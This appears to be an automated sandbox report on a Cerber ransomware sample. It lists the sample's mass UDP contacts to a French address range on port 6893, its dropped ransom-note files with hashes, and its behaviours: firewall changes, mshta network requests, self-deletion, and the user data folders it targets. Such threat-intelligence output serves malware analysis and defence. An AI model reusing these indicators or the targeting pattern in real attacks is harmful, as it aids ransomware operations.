FR 178.33.161.138:6893 udp
FR 178.33.161.139:6893 udp
FR 178.33.161.140:6893 udp
FR 178.33.161.141:6893 udp
FR 178.33.161.142:6893 udp
FR 178.33.161.143:6893 udp
FR 178.33.161.144:6893 udp
FR 178.33.161.145:6893 udp
FR 178.33.161.146:6893 udp
FR 178.33.161.147:6893 udp
FR 178.33.161.148:6893 udp
FR 178.33.161.149:6893 udp
FR 178.33.161.150:6893 udp
FR 178.33.161.151:6893 udp
FR 178.33.161.152:6893 udp
FR 178.33.161.153:6893 udp
FR 178.33.161.154:6893 udp
FR 178.33.161.155:6893 udp
FR 178.33.161.156:6893 udp
FR 178.33.161.157:6893 udp
FR 178.33.161.158:6893 udp
FR 178.33.161.159:6893 udp
FR 178.33.161.160:6893 udp
FR 178.33.161.161:6893 udp
FR 178.33.161.162:6893 udp
FR 178.33.161.163:6893 udp
FR 178.33.161.164:6893 udp
FR 178.33.161.165:6893 udp
FR 178.33.161.166:6893 udp
FR 178.33.161.167:6893 udp
FR 178.33.161.168:6893 udp
FR 178.33.161.169:6893 udp
FR 178.33.161.170:6893 udp
FR 178.33.161.171:6893 udp
FR 178.33.161.172:6893 udp
FR 178.33.161.173:6893 udp
FR 178.33.161.174:6893 udp
FR 178.33.161.175:6893 udp
FR 178.33.161.176:6893 udp
FR 178.33.161.177:6893 udp
FR 178.33.161.178:6893 udp
FR 178.33.161.179:6893 udp
FR 178.33.161.180:6893 udp
FR 178.33.161.181:6893 udp
FR 178.33.161.182:6893 udp
FR 178.33.161.183:6893 udp
FR 178.33.161.184:6893 udp
FR 178.33.161.185:6893 udp
FR 178.33.161.186:6893 udp
FR 178.33.161.187:6893 udp
FR 178.33.161.188:6893 udp
FR 178.33.161.189:6893 udp
FR 178.33.161.190:6893 udp
FR 178.33.161.191:6893 udp
FR 178.33.161.192:6893 udp
FR 178.33.161.193:6893 udp
FR 178.33.161.194:6893 udp
FR 178.33.161.195:6893 udp
FR 178.33.161.196:6893 udp
FR 178.33.161.197:6893 udp
FR 178.33.161.198:6893 udp
FR 178.33.161.199:6893 udp
FR 178.33.161.200:6893 udp
FR 178.33.161.201:6893 udp
FR 178.33.161.202:6893 udp
FR 178.33.161.203:6893 udp
FR 178.33.161.204:6893 udp
FR 178.33.161.205:6893 udp
FR 178.33.161.206:6893 udp
FR 178.33.161.207:6893 udp
FR 178.33.161.208:6893 udp
FR 178.33.161.209:6893 udp
FR 178.33.161.210:6893 udp
FR 178.33.161.211:6893 udp
FR 178.33.161.212:6893 udp
FR 178.33.161.213:6893 udp
FR 178.33.161.214:6893 udp
FR 178.33.161.215:6893 udp
FR 178.33.161.216:6893 udp
FR 178.33.161.217:6893 udp
FR 178.33.161.218:6893 udp
FR 178.33.161.219:6893 udp
FR 178.33.161.220:6893 udp
FR 178.33.161.221:6893 udp
FR 178.33.161.222:6893 udp
FR 178.33.161.223:6893 udp
FR 178.33.161.224:6893 udp
FR 178.33.161.225:6893 udp
FR 178.33.161.226:6893 udp
FR 178.33.161.227:6893 udp
FR 178.33.161.228:6893 udp
FR 178.33.161.229:6893 udp
FR 178.33.161.230:6893 udp
FR 178.33.161.231:6893 udp
FR 178.33.161.232:6893 udp
FR 178.33.161.233:6893 udp
FR 178.33.161.234:6893 udp
FR 178.33.161.235:6893 udp
FR 178.33.161.236:6893 udp
FR 178.33.161.237:6893 udp
FR 178.33.161.238:6893 udp
FR 178.33.161.239:6893 udp
FR 178.33.161.240:6893 udp
FR 178.33.161.241:6893 udp
FR 178.33.161.242:6893 udp
FR 178.33.161.243:6893 udp
FR 178.33.161.244:6893 udp
FR 178.33.161.245:6893 udp
FR 178.33.161.246:6893 udp
FR 178.33.161.247:6893 udp
FR 178.33.161.248:6893 udp
FR 178.33.161.249:6893 udp
FR 178.33.161.250:6893 udp
FR 178.33.161.251:6893 udp
FR 178.33.161.252:6893 udp
FR 178.33.161.253:6893 udp
FR 178.33.161.254:6893 udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
FR 178.33.161.255:6893 udp
FR 178.33.162.0:6893 udp
FR 178.33.162.1:6893 udp
FR 178.33.162.2:6893 udp
FR 178.33.162.3:6893 udp
FR 178.33.162.4:6893 udp
FR 178.33.162.5:6893 udp
FR 178.33.162.6:6893 udp
FR 178.33.162.7:6893 udp
FR 178.33.162.8:6893 udp
FR 178.33.162.9:6893 udp
FR 178.33.162.10:6893 udp
FR 178.33.162.11:6893 udp
FR 178.33.162.12:6893 udp
FR 178.33.162.13:6893 udp
FR 178.33.162.14:6893 udp
FR 178.33.162.15:6893 udp
FR 178.33.162.16:6893 udp
FR 178.33.162.17:6893 udp
FR 178.33.162.18:6893 udp
FR 178.33.162.19:6893 udp
FR 178.33.162.20:6893 udp
FR 178.33.162.21:6893 udp
FR 178.33.162.22:6893 udp
FR 178.33.162.23:6893 udp
FR 178.33.162.24:6893 udp
FR 178.33.162.25:6893 udp
FR 178.33.162.26:6893 udp
FR 178.33.162.27:6893 udp
FR 178.33.162.28:6893 udp
FR 178.33.162.29:6893 udp
FR 178.33.162.30:6893 udp
FR 178.33.162.31:6893 udp
FR 178.33.162.32:6893 udp
FR 178.33.162.33:6893 udp
FR 178.33.162.34:6893 udp
FR 178.33.162.35:6893 udp
FR 178.33.162.36:6893 udp
FR 178.33.162.37:6893 udp
FR 178.33.162.38:6893 udp
FR 178.33.162.39:6893 udp
FR 178.33.162.40:6893 udp
FR 178.33.162.41:6893 udp
FR 178.33.162.42:6893 udp
FR 178.33.162.43:6893 udp
FR 178.33.162.44:6893 udp
FR 178.33.162.45:6893 udp
FR 178.33.162.46:6893 udp
FR 178.33.162.47:6893 udp
FR 178.33.162.48:6893 udp
FR 178.33.162.49:6893 udp
FR 178.33.162.50:6893 udp
FR 178.33.162.51:6893 udp
FR 178.33.162.52:6893 udp
FR 178.33.162.53:6893 udp
FR 178.33.162.54:6893 udp
FR 178.33.162.55:6893 udp
FR 178.33.162.56:6893 udp
FR 178.33.162.57:6893 udp
FR 178.33.162.58:6893 udp
FR 178.33.162.59:6893 udp
FR 178.33.162.60:6893 udp
FR 178.33.162.61:6893 udp
FR 178.33.162.62:6893 udp
FR 178.33.162.63:6893 udp
FR 178.33.162.64:6893 udp
FR 178.33.162.65:6893 udp
FR 178.33.162.66:6893 udp
FR 178.33.162.67:6893 udp
FR 178.33.162.68:6893 udp
FR 178.33.162.69:6893 udp
FR 178.33.162.70:6893 udp
FR 178.33.162.71:6893 udp
FR 178.33.162.72:6893 udp
FR 178.33.162.73:6893 udp
FR 178.33.162.74:6893 udp
FR 178.33.162.75:6893 udp
FR 178.33.162.76:6893 udp
FR 178.33.162.77:6893 udp
FR 178.33.162.78:6893 udp
FR 178.33.162.79:6893 udp
FR 178.33.162.80:6893 udp
FR 178.33.162.81:6893 udp
FR 178.33.162.82:6893 udp
FR 178.33.162.83:6893 udp
FR 178.33.162.84:6893 udp
FR 178.33.162.85:6893 udp
FR 178.33.162.86:6893 udp
FR 178.33.162.87:6893 udp
FR 178.33.162.88:6893 udp
FR 178.33.162.89:6893 udp
FR 178.33.162.90:6893 udp
FR 178.33.162.91:6893 udp
FR 178.33.162.92:6893 udp
FR 178.33.162.93:6893 udp
FR 178.33.162.94:6893 udp
FR 178.33.162.95:6893 udp
FR 178.33.162.96:6893 udp
FR 178.33.162.97:6893 udp
FR 178.33.162.98:6893 udp
FR 178.33.162.99:6893 udp
FR 178.33.162.100:6893 udp
FR 178.33.162.101:6893 udp
FR 178.33.162.102:6893 udp
FR 178.33.162.103:6893 udp
FR 178.33.162.104:6893 udp
FR 178.33.162.105:6893 udp
FR 178.33.162.106:6893 udp
FR 178.33.162.107:6893 udp
FR 178.33.162.108:6893 udp
FR 178.33.162.109:6893 udp
FR 178.33.162.110:6893 udp
FR 178.33.162.111:6893 udp
FR 178.33.162.112:6893 udp
FR 178.33.162.113:6893 udp
FR 178.33.162.114:6893 udp
FR 178.33.162.115:6893 udp
FR 178.33.162.116:6893 udp
FR 178.33.162.117:6893 udp
FR 178.33.162.118:6893 udp
FR 178.33.162.119:6893 udp
FR 178.33.162.120:6893 udp
FR 178.33.162.121:6893 udp
FR 178.33.162.122:6893 udp
FR 178.33.162.123:6893 udp
FR 178.33.162.124:6893 udp
FR 178.33.162.125:6893 udp
FR 178.33.162.126:6893 udp
FR 178.33.162.127:6893 udp
FR 178.33.162.128:6893 udp
FR 178.33.162.129:6893 udp
FR 178.33.162.130:6893 udp
FR 178.33.162.131:6893 udp
FR 178.33.162.132:6893 udp
FR 178.33.162.133:6893 udp
FR 178.33.162.134:6893 udp
FR 178.33.162.135:6893 udp
FR 178.33.162.136:6893 udp
FR 178.33.162.137:6893 udp
FR 178.33.162.138:6893 udp
FR 178.33.162.139:6893 udp
FR 178.33.162.140:6893 udp
FR 178.33.162.141:6893 udp
FR 178.33.162.142:6893 udp
FR 178.33.162.143:6893 udp
FR 178.33.162.144:6893 udp
FR 178.33.162.145:6893 udp
FR 178.33.162.146:6893 udp
FR 178.33.162.147:6893 udp
FR 178.33.162.148:6893 udp
FR 178.33.162.149:6893 udp
FR 178.33.162.150:6893 udp
FR 178.33.162.151:6893 udp
FR 178.33.162.152:6893 udp
FR 178.33.162.153:6893 udp
FR 178.33.162.154:6893 udp
FR 178.33.162.155:6893 udp
FR 178.33.162.156:6893 udp
FR 178.33.162.157:6893 udp
FR 178.33.162.158:6893 udp
FR 178.33.162.159:6893 udp
FR 178.33.162.160:6893 udp
FR 178.33.162.161:6893 udp
FR 178.33.162.162:6893 udp
FR 178.33.162.163:6893 udp
FR 178.33.162.164:6893 udp
FR 178.33.162.165:6893 udp
FR 178.33.162.166:6893 udp
FR 178.33.162.167:6893 udp
FR 178.33.162.168:6893 udp
FR 178.33.162.169:6893 udp
FR 178.33.162.170:6893 udp
FR 178.33.162.171:6893 udp
FR 178.33.162.172:6893 udp
FR 178.33.162.173:6893 udp
FR 178.33.162.174:6893 udp
FR 178.33.162.175:6893 udp
FR 178.33.162.176:6893 udp
FR 178.33.162.177:6893 udp
FR 178.33.162.178:6893 udp
FR 178.33.162.179:6893 udp
FR 178.33.162.180:6893 udp
FR 178.33.162.181:6893 udp
FR 178.33.162.182:6893 udp
FR 178.33.162.183:6893 udp
FR 178.33.162.184:6893 udp
FR 178.33.162.185:6893 udp
FR 178.33.162.186:6893 udp
FR 178.33.162.187:6893 udp
FR 178.33.162.188:6893 udp
FR 178.33.162.189:6893 udp
FR 178.33.162.190:6893 udp
FR 178.33.162.191:6893 udp
FR 178.33.162.192:6893 udp
FR 178.33.162.193:6893 udp
FR 178.33.162.194:6893 udp
FR 178.33.162.195:6893 udp
FR 178.33.162.196:6893 udp
FR 178.33.162.197:6893 udp
FR 178.33.162.198:6893 udp
FR 178.33.162.199:6893 udp
FR 178.33.162.200:6893 udp
FR 178.33.162.201:6893 udp
FR 178.33.162.202:6893 udp
FR 178.33.162.203:6893 udp
FR 178.33.162.204:6893 udp
FR 178.33.162.205:6893 udp
FR 178.33.162.206:6893 udp
FR 178.33.162.207:6893 udp
FR 178.33.162.208:6893 udp
FR 178.33.162.209:6893 udp
FR 178.33.162.210:6893 udp
FR 178.33.162.211:6893 udp
FR 178.33.162.212:6893 udp
FR 178.33.162.213:6893 udp
FR 178.33.162.214:6893 udp
FR 178.33.162.215:6893 udp
FR 178.33.162.216:6893 udp
FR 178.33.162.217:6893 udp
FR 178.33.162.218:6893 udp
FR 178.33.162.219:6893 udp
FR 178.33.162.220:6893 udp
FR 178.33.162.221:6893 udp
FR 178.33.162.222:6893 udp
FR 178.33.162.223:6893 udp
FR 178.33.162.224:6893 udp
FR 178.33.162.225:6893 udp
FR 178.33.162.226:6893 udp
FR 178.33.162.227:6893 udp
FR 178.33.162.228:6893 udp
FR 178.33.162.229:6893 udp
FR 178.33.162.230:6893 udp
FR 178.33.162.231:6893 udp
FR 178.33.162.232:6893 udp
FR 178.33.162.233:6893 udp
FR 178.33.162.234:6893 udp
FR 178.33.162.235:6893 udp
FR 178.33.162.236:6893 udp
FR 178.33.162.237:6893 udp
FR 178.33.162.238:6893 udp
FR 178.33.162.239:6893 udp
FR 178.33.162.240:6893 udp
FR 178.33.162.241:6893 udp
FR 178.33.162.242:6893 udp
FR 178.33.162.243:6893 udp
FR 178.33.162.244:6893 udp
FR 178.33.162.245:6893 udp
FR 178.33.162.246:6893 udp
FR 178.33.162.247:6893 udp
FR 178.33.162.248:6893 udp
FR 178.33.162.249:6893 udp
FR 178.33.162.250:6893 udp
FR 178.33.162.251:6893 udp
FR 178.33.162.252:6893 udp
FR 178.33.162.253:6893 udp
FR 178.33.162.254:6893 udp
FR 178.33.162.255:6893 udp
FR 178.33.163.0:6893 udp
FR 178.33.163.1:6893 udp
FR 178.33.163.2:6893 udp
FR 178.33.163.3:6893 udp
FR 178.33.163.4:6893 udp
FR 178.33.163.5:6893 udp
FR 178.33.163.6:6893 udp
FR 178.33.163.7:6893 udp
FR 178.33.163.8:6893 udp
FR 178.33.163.9:6893 udp
FR 178.33.163.10:6893 udp
FR 178.33.163.11:6893 udp
FR 178.33.163.12:6893 udp
FR 178.33.163.13:6893 udp
FR 178.33.163.14:6893 udp
FR 178.33.163.15:6893 udp
FR 178.33.163.16:6893 udp
FR 178.33.163.17:6893 udp
FR 178.33.163.18:6893 udp
FR 178.33.163.19:6893 udp
FR 178.33.163.20:6893 udp
FR 178.33.163.21:6893 udp
FR 178.33.163.22:6893 udp
FR 178.33.163.23:6893 udp
FR 178.33.163.24:6893 udp
FR 178.33.163.25:6893 udp
FR 178.33.163.26:6893 udp
FR 178.33.163.27:6893 udp
FR 178.33.163.28:6893 udp
FR 178.33.163.29:6893 udp
FR 178.33.163.30:6893 udp
FR 178.33.163.31:6893 udp
FR 178.33.163.32:6893 udp
FR 178.33.163.33:6893 udp
FR 178.33.163.34:6893 udp
FR 178.33.163.35:6893 udp
FR 178.33.163.36:6893 udp
FR 178.33.163.37:6893 udp
FR 178.33.163.38:6893 udp
FR 178.33.163.39:6893 udp
FR 178.33.163.40:6893 udp
FR 178.33.163.41:6893 udp
FR 178.33.163.42:6893 udp
FR 178.33.163.43:6893 udp
FR 178.33.163.44:6893 udp
FR 178.33.163.45:6893 udp
FR 178.33.163.46:6893 udp
FR 178.33.163.47:6893 udp
FR 178.33.163.48:6893 udp
FR 178.33.163.49:6893 udp
FR 178.33.163.50:6893 udp
FR 178.33.163.51:6893 udp
FR 178.33.163.52:6893 udp
FR 178.33.163.53:6893 udp
FR 178.33.163.54:6893 udp
FR 178.33.163.55:6893 udp
FR 178.33.163.56:6893 udp
FR 178.33.163.57:6893 udp
FR 178.33.163.58:6893 udp
FR 178.33.163.59:6893 udp
FR 178.33.163.60:6893 udp
FR 178.33.163.61:6893 udp
FR 178.33.163.62:6893 udp
FR 178.33.163.63:6893 udp
FR 178.33.163.64:6893 udp
FR 178.33.163.65:6893 udp
FR 178.33.163.66:6893 udp
FR 178.33.163.67:6893 udp
FR 178.33.163.68:6893 udp
FR 178.33.163.69:6893 udp
FR 178.33.163.70:6893 udp
FR 178.33.163.71:6893 udp
FR 178.33.163.72:6893 udp
FR 178.33.163.73:6893 udp
FR 178.33.163.74:6893 udp
FR 178.33.163.75:6893 udp
FR 178.33.163.76:6893 udp
FR 178.33.163.77:6893 udp
FR 178.33.163.78:6893 udp
FR 178.33.163.79:6893 udp
FR 178.33.163.80:6893 udp
FR 178.33.163.81:6893 udp
FR 178.33.163.82:6893 udp
FR 178.33.163.83:6893 udp
FR 178.33.163.84:6893 udp
FR 178.33.163.85:6893 udp
FR 178.33.163.86:6893 udp
FR 178.33.163.87:6893 udp
FR 178.33.163.88:6893 udp
FR 178.33.163.89:6893 udp
FR 178.33.163.90:6893 udp
FR 178.33.163.91:6893 udp
FR 178.33.163.92:6893 udp
FR 178.33.163.93:6893 udp
FR 178.33.163.94:6893 udp
FR 178.33.163.95:6893 udp
FR 178.33.163.96:6893 udp
FR 178.33.163.97:6893 udp
FR 178.33.163.98:6893 udp
FR 178.33.163.99:6893 udp
FR 178.33.163.100:6893 udp
FR 178.33.163.101:6893 udp
FR 178.33.163.102:6893 udp
FR 178.33.163.103:6893 udp
FR 178.33.163.104:6893 udp
FR 178.33.163.105:6893 udp
FR 178.33.163.106:6893 udp
FR 178.33.163.107:6893 udp
FR 178.33.163.108:6893 udp
FR 178.33.163.109:6893 udp
FR 178.33.163.110:6893 udp
FR 178.33.163.111:6893 udp
FR 178.33.163.112:6893 udp
FR 178.33.163.113:6893 udp
FR 178.33.163.114:6893 udp
FR 178.33.163.115:6893 udp
FR 178.33.163.116:6893 udp
FR 178.33.163.117:6893 udp
FR 178.33.163.118:6893 udp
FR 178.33.163.119:6893 udp
FR 178.33.163.120:6893 udp
FR 178.33.163.121:6893 udp
FR 178.33.163.122:6893 udp
FR 178.33.163.123:6893 udp
FR 178.33.163.124:6893 udp
FR 178.33.163.125:6893 udp
FR 178.33.163.126:6893 udp
FR 178.33.163.127:6893 udp
FR 178.33.163.128:6893 udp
FR 178.33.163.129:6893 udp
FR 178.33.163.130:6893 udp
FR 178.33.163.131:6893 udp
FR 178.33.163.132:6893 udp
FR 178.33.163.133:6893 udp
FR 178.33.163.134:6893 udp
FR 178.33.163.135:6893 udp
FR 178.33.163.136:6893 udp
FR 178.33.163.137:6893 udp
FR 178.33.163.138:6893 udp
FR 178.33.163.139:6893 udp
FR 178.33.163.140:6893 udp
FR 178.33.163.141:6893 udp
FR 178.33.163.142:6893 udp
FR 178.33.163.143:6893 udp
FR 178.33.163.144:6893 udp
FR 178.33.163.145:6893 udp
FR 178.33.163.146:6893 udp
FR 178.33.163.147:6893 udp
FR 178.33.163.148:6893 udp
FR 178.33.163.149:6893 udp
FR 178.33.163.150:6893 udp
FR 178.33.163.151:6893 udp
FR 178.33.163.152:6893 udp
FR 178.33.163.153:6893 udp
FR 178.33.163.154:6893 udp
FR 178.33.163.155:6893 udp
FR 178.33.163.156:6893 udp
FR 178.33.163.157:6893 udp
FR 178.33.163.158:6893 udp
FR 178.33.163.159:6893 udp
FR 178.33.163.160:6893 udp
FR 178.33.163.161:6893 udp
FR 178.33.163.162:6893 udp
FR 178.33.163.163:6893 udp
FR 178.33.163.164:6893 udp
FR 178.33.163.165:6893 udp
FR 178.33.163.166:6893 udp
FR 178.33.163.167:6893 udp
FR 178.33.163.168:6893 udp
FR 178.33.163.169:6893 udp
FR 178.33.163.170:6893 udp
FR 178.33.163.171:6893 udp
FR 178.33.163.172:6893 udp
FR 178.33.163.173:6893 udp
FR 178.33.163.174:6893 udp
FR 178.33.163.175:6893 udp
FR 178.33.163.176:6893 udp
FR 178.33.163.177:6893 udp
FR 178.33.163.178:6893 udp
FR 178.33.163.179:6893 udp
FR 178.33.163.180:6893 udp
FR 178.33.163.181:6893 udp
FR 178.33.163.182:6893 udp
FR 178.33.163.183:6893 udp
FR 178.33.163.184:6893 udp
FR 178.33.163.185:6893 udp
FR 178.33.163.186:6893 udp
FR 178.33.163.187:6893 udp
FR 178.33.163.188:6893 udp
FR 178.33.163.189:6893 udp
FR 178.33.163.190:6893 udp
FR 178.33.163.191:6893 udp
FR 178.33.163.192:6893 udp
FR 178.33.163.193:6893 udp
FR 178.33.163.194:6893 udp
FR 178.33.163.195:6893 udp
FR 178.33.163.196:6893 udp
FR 178.33.163.197:6893 udp
FR 178.33.163.198:6893 udp
FR 178.33.163.199:6893 udp
FR 178.33.163.200:6893 udp
FR 178.33.163.201:6893 udp
FR 178.33.163.202:6893 udp
FR 178.33.163.203:6893 udp
FR 178.33.163.204:6893 udp
FR 178.33.163.205:6893 udp
FR 178.33.163.206:6893 udp
FR 178.33.163.207:6893 udp
FR 178.33.163.208:6893 udp
FR 178.33.163.209:6893 udp
FR 178.33.163.210:6893 udp
FR 178.33.163.211:6893 udp
FR 178.33.163.212:6893 udp
FR 178.33.163.213:6893 udp
FR 178.33.163.214:6893 udp
FR 178.33.163.215:6893 udp
FR 178.33.163.216:6893 udp
FR 178.33.163.217:6893 udp
FR 178.33.163.218:6893 udp
FR 178.33.163.219:6893 udp
FR 178.33.163.220:6893 udp
FR 178.33.163.221:6893 udp
FR 178.33.163.222:6893 udp
FR 178.33.163.223:6893 udp
FR 178.33.163.224:6893 udp
FR 178.33.163.225:6893 udp
FR 178.33.163.226:6893 udp
FR 178.33.163.227:6893 udp
FR 178.33.163.228:6893 udp
FR 178.33.163.229:6893 udp
FR 178.33.163.230:6893 udp
FR 178.33.163.231:6893 udp
FR 178.33.163.232:6893 udp
FR 178.33.163.233:6893 udp
FR 178.33.163.234:6893 udp
FR 178.33.163.235:6893 udp
FR 178.33.163.236:6893 udp
FR 178.33.163.237:6893 udp
FR 178.33.163.238:6893 udp
FR 178.33.163.239:6893 udp
FR 178.33.163.240:6893 udp
FR 178.33.163.241:6893 udp
FR 178.33.163.242:6893 udp
FR 178.33.163.243:6893 udp
FR 178.33.163.244:6893 udp
FR 178.33.163.245:6893 udp
FR 178.33.163.246:6893 udp
FR 178.33.163.247:6893 udp
FR 178.33.163.248:6893 udp
FR 178.33.163.249:6893 udp
FR 178.33.163.250:6893 udp
FR 178.33.163.251:6893 udp
FR 178.33.163.252:6893 udp
FR 178.33.163.253:6893 udp
FR 178.33.163.254:6893 udp
FR 178.33.163.255:6893 udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.204.74:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 63.242.123.52.in-addr.arpa udp

Files

memory/8-0-0x0000000000640000-0x0000000000671000-memory.dmp

memory/8-1-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-3-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-7-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-8-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-12-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___PP0MW4ML_.txt

MD5 7f51304cadcf3569710d715abffb6c66
SHA1 90d6a81c1c8815300ad8033675451c2d81ed6122
SHA256 78974b71ac312f5dd8305d10f826de9d13e2b31183a6cdfe2fadb26828cd990f
SHA512 3ced58767d702ecf0f351e0e99787314c06516ea7d5404a2001d98fc5d7f7b55304ddd372b62af0660f89285a2154d04ccc1c7ad891dc0adc5c5e215fa1c165c

C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\_R_E_A_D___T_H_I_S___DAVP5KX_.hta

MD5 5629fc7751dcdf21f245a775d12697ab
SHA1 f2c6e68b3c9339c1f0263d610df1b61431bcbac8
SHA256 b35e5a86466a238e4b15671fc0fcd0fca0b6314c2ee3c782c40e72bc2ca6ba7d
SHA512 f5ed260dc3e20656c69902bf0ed05d77e6346d47e79912637c429e393083cf894fccac5f641da8bdfe4bd050d75c8c03442a1a32f6c9b31f28bdfa096ea599de

memory/8-353-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-350-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-360-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-379-0x0000000000400000-0x0000000000435000-memory.dmp

memory/8-380-0x0000000000440000-0x0000000000451000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:02

Platform

win7-20240220-en

Max time kernel

136s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe"

Signatures

Cerber

ransomware cerber

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Contacts a large (1095) amount of remote hosts

discovery

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
